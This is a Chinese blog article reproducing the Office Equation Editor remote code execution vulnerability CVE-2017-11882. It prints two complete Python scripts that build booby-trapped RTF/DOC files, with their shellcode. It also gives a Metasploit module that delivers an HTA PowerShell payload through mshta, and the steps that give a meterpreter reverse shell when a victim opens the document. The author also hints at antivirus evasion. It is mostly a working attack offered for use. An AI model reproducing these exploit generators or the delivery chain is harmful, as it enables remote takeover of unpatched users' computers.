Office 远程代码执行漏洞复现过程

本文来自作者 肖志华 在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」，「阅读原文」查看交流实录。

编辑 | 天津饭

直接贴本地复现过程，至于怎么利用还请自己思考。

2017年11月14日，微软发布了11月份的安全补丁更新，其中比较引人关注的莫过于悄然修复了潜伏17年之久的 Office 远程代码执行漏洞（CVE-2017-11882）。

该漏洞为 Office 内存破坏漏洞，影响目前流行的所有 Office 版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。

由于漏洞影响面较广，漏洞披露后，金睛安全研究团队持续对漏洞相关攻击事件进行关注。

11月19日，监控到了已有漏洞 POC 在网上流传，随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。

漏洞影响到的版本有：

• Office 365

• Microsoft Office 2000

• Microsoft Office 2003

• Microsoft Office 2007 Service Pack 3

• Microsoft Office 2010 Service Pack 2

• Microsoft Office 2013 Service Pack 1

• Microsoft Office 2016

等于说，影响现在主流的 Office 版本，基本可以做到通杀。

这里我给出两个 POC。

• https://github.com/embedi/CVE-2017-11882，国外黑客所写

• https://github.com/Ridter/CVE-2017-11882，国内黑客所写

两个 POC 的代码我也贴在下面。

Command43b_CVE-2017-11882.py 的代码如下：

import argparse
import sys


RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
    {\*\generator Riched20 6.3.9600}\viewkind4\uc1
    \pard\sa200\sl276\slmult1\f0\fs22\lang9"""


RTF_TRAILER = R"""\par}
    """


OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """


OBJECT_TRAILER = R"""
    }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
    {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
    {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
    {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
    \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
    00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
    """


OBJDATA_TEMPLATE = R"""
    01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
    b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
    0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
    fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
    000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
    0000000000000000000000000000000000000000000000000000001400000000000000010043006f
    006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
    00000000000000000000000000000000000000000000000000000000000000010000006600000000
    00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
    ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
    0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
    ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
    30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
    00000000000000000000000000000000000000000000000000000000000000000000000000030004
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
    ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
    414141414141414141414141414141414141414141120c4300000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000004500710075
    006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
    0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
    0000000000000000000000000000000000000000000000000000000000000004000000c500000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
    ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000ff
    ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
    45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
    000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
    050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
    ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
    54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
    7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
    90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
    0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
    31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
    0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
    7cef1800040000002d01010004000000f0010000030000000000
    """


COMMAND_OFFSET = 0x949*2


def create_ole_exec_primitive(command):
    if len(command) > 43:
        print "[!] Primitive command must be shorter than 43 bytes"
        sys.exit(0)
    hex_command = command.encode("hex")
    objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
    ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER



def create_rtf(header,command,trailer):
    ole1 = create_ole_exec_primitive(command + " &")

    # We need 2 or more commands for executing remote file from WebDAV
    # because WebClient service start may take some time
    return header + ole1 + trailer

def getrheader(file):
    input_file = open(file,"r").read()
    r_header = input_file.split("{\*\datastore")[0]
    return r_header

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
    parser.add_argument("-c", "--command", help="Command to execute.", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)

    args = parser.parse_args()
    if args.input != None:
        r_header = getrheader(args.input)
    else:
        r_header = RTF_HEADER

    rtf_content = create_rtf(r_header, args.command ,RTF_TRAILER)

    output_file = open(args.output, "w")
    output_file.write(rtf_content)

    print "[*] Done ! output file --> " + args.output

Command109b_CVE-2017-11882.py 的代码如下：

# Original poc :https://github.com/embedi/CVE-2017-11882
# This version accepts a command with 109 bytes long in maximum.
# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.
# But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)

import argparse
import sys

from struct import pack

head=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
    {\*\generator Riched20 6.3.9600}\viewkind4\uc1 
    \pard\sa200\sl276\slmult1\f0\fs22\lang9'''

objclass=r'''{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'''

tail=r'''

    00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000

    }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}

    {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}

    {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}

    {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0

    \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02

    00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}\par}

    '''

    #0:  b8 44 eb 71 12          mov    eax,0x1271eb44

    #5:  ba 78 56 34 12          mov    edx,0x12345678

    #a:  31 d0                   xor    eax,edx

    #c:  8b 08                   mov    ecx,DWORD PTR [eax]

    #e:  8b 09                   mov    ecx,DWORD PTR [ecx]

    #10: 8b 09                   mov    ecx,DWORD PTR [ecx]

    #12: 66 83 c1 3c             add    cx,0x3c

    #16: 31 db                   xor    ebx,ebx

    #18: 53                      push   ebx

    #19: 51                      push   ecx

    #1a: be 64 3e 72 12          mov    esi,0x12723e64

    #1f: 31 d6                   xor    esi,edx

    #21: ff 16                   call   DWORD PTR [esi] // call WinExec

    #23: 53                      push   ebx

    #24: 66 83 ee 4c             sub    si,0x4c

    #28: ff 10                   call   DWORD PTR [eax] // call ExitProcess

stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"

# pads with nop
stage1=stage1.ljust(44,'\x90')

def genrtf(cmd,r_head):

    if len(cmd) > 109:

       print "[!] Primitive command must be shorter than 109 bytes"

       sys.exit(0)

    payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'

    payload+=stage1

    payload+=pack('<I',0x00402114) # ret

    payload+='\x00'*2

    payload+=cmd

    payload=payload.ljust(197,'\x00')


    return r_head+objclass+payload.encode('hex')+tail

def getrheader(file):

    input_file = open(file,"r").read()

    r_header = input_file.split("{\*\datastore")[0]

    return r_header  

if __name__ == '__main__':

    parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
    parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)

    args = parser.parse_args()

    if args.input != None:
        r_header = getrheader(args.input)
    else:
        r_header = head

        with open(args.output,'wb') as f:
            f.write(genrtf(args.cmd,r_header))
            f.close()

        print "[*] Done ! output file --> " + args.output

利用到的工具如下：

• Windows7

• Office2013

• Metasploit

利用的过程如下:

打开上面的 Command43b_CVE-2017-11882.py 的脚本，测试一下 DOC 文件。

使用命令如下：

python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc

使用这条命令后会在目录里生成一个名为 cve.doc 的 doc 文件，拿到 Windows7 靶机去打开看看效果。如下图所示。

Windows7 打开恶意 doc 文件后，系统调用的计算器已经弹出，证明该 POC 是可行的（为什么要弹计算器……这个梗已经被众多黑客玩烂了……）。

MSF 进行漏洞利用

现在就需要一个 rb 脚本来和 MSF 进行交互，具体操作如下。

首先需要在 MSF 里添加这个脚本，如果 MSF 没有作改动，路径应该是 /usr/share/metasploit-framework/modules/exploits/windows，可以在这目录下新建一个文件夹。

将下面的脚本写入到 PS_shell.rb。

##
   # This module requires Metasploit: https://metasploit.com/download
   # Current source: https://github.com/rapid7/metasploit-framework
##


   class MetasploitModule  < Msf::Exploit::Remote
     Rank = NormalRanking

     include Msf::Exploit::Remote::HttpServer

     def initialize(info  = {})
       super(update_info(info,
         'Name' => 'Microsoft Office Payload Delivery',
         'Description' => %q{
           This module generates an command to place within
           a word document, that when executed, will retrieve a HTA payload
           via HTTP from an web server. Currently have not figured out how
           to generate a doc.
         },
         'License' => MSF_LICENSE,
         'Arch' => ARCH_X86,
         'Platform' => 'win',
         'Targets' =>
           [
             ['Automatic', {} ],
           ],
         'DefaultTarget' => 0,
       ))
     end

     def on_request_uri(cli, _request)
       print_status("Delivering payload")
       p = regenerate_payload(cli)
       data = Msf::Util::EXE.to_executable_fmt(
         framework,
         ARCH_X86,
         'win',
         p.encoded,
         'hta-psh',
         { :arch => ARCH_X86, :platform => 'win '}
       )
       send_response(cli, data, 'Content-Type' => 'application/hta')
     end


     def primer
       url = get_uri
       print_status("Place the following DDE in an MS document:")
       print_line("mshta.exe \"#{url}\"")
     end
   end

打开 MSF 后，搜搜漏洞利用模块。

msf > PS_shell

如下图所示。

使用该模块

msf > use exploit/windows/CVE-2017-11882/PS_shell

如下图所示。

上图的操作过程如下：

   msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp  //设置payload为反弹TCP连接
    payload => windows/meterpreter/reverse_tcp
    msf exploit(PS_shell) > set lhost 192.168.30.128 //设置本机IP
    lhost => 172.16.253.76
    msf exploit(PS_shell) > set URIPATH test  //设置URI地址
    URIPATH => abc
    msf exploit(PS_shell) > show options  //检查配置

    Module options (exploit/windows/CVE-2017-11882/PS_shell):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT  8080             yes       The local port to listen on.
       SSL      false            no        Negotiate SSL for incoming connections
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH  test             no        The URI to use for this exploit (default is random)


    Payload options (windows/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.30.128   yes       The listen address
       LPORT     4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Automatic

配置无误后即可执行，执行后 MSF 会监听本地8080端口，如果机器打开 doc 就会触发，反弹 shell 建立会话。

   msf exploit(PS_shell) > exploit -j
    [*] Exploit running as background job.

    [*] Started reverse TCP handler on 192.168.30.128:4444 
    msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/test
    [*] Local IP: http://192.168.30.128:8080/test
    [*] Server started.
    [*] Place the following DDE in an MS document:
    mshta.exe "http://192.168.30.128:8080/test"

此时这个 test 显然不是一份 doc 格式的文件，我们需要用到刚刚用的 py 脚本文件，生成一份恶意的 doc 文件。

生成恶意 doc 文件

如下图所示。

这个时候，拿 test1.doc 文件到 Windows7 去打开试试，如下图所示。

Windows7 打开效果

如下图所示。

MSF 监听效果

如下图所示。

可以看到 MSF 已经和 Windows7 建立起了连接，此种攻击方式利用的是 powershell 反弹，打开恶意 doc 文档的时候会一闪而逝的“Poweshell”窗口。

net user

如下图所示。

到此漏洞复现完成。说点其他的，现在的攻击方式可不止 EXE 文件这种方式。

样本文件360会扫描识别到并且拦截，因为调用了 powershell，类似于恶意动作，360会报警。

但是可以用免杀处理一下，至于怎么处理，就看各位的功夫了。

一般人不会想到恶意 doc 文档攻击，尽量小心陌生人发来的东西，可能不止是 EXE 文件，doc 也可能会充满恶意。

近期热文

《如何高效开启你的顾问人生模式》

《Python 机器学习 Scikit-learn 完全入门指南》

《那些精贵的文献资源下载网址经验总结》

《Java 架构师眼中的 HTTP 协议》

《OpenVPN 的穿墙远程连接旅程》

《前端跨域问题各种解决方案》

《程序员跳槽时，如何高效地准备面试？》

「阅读原文」看交流实录，你想知道的都在这里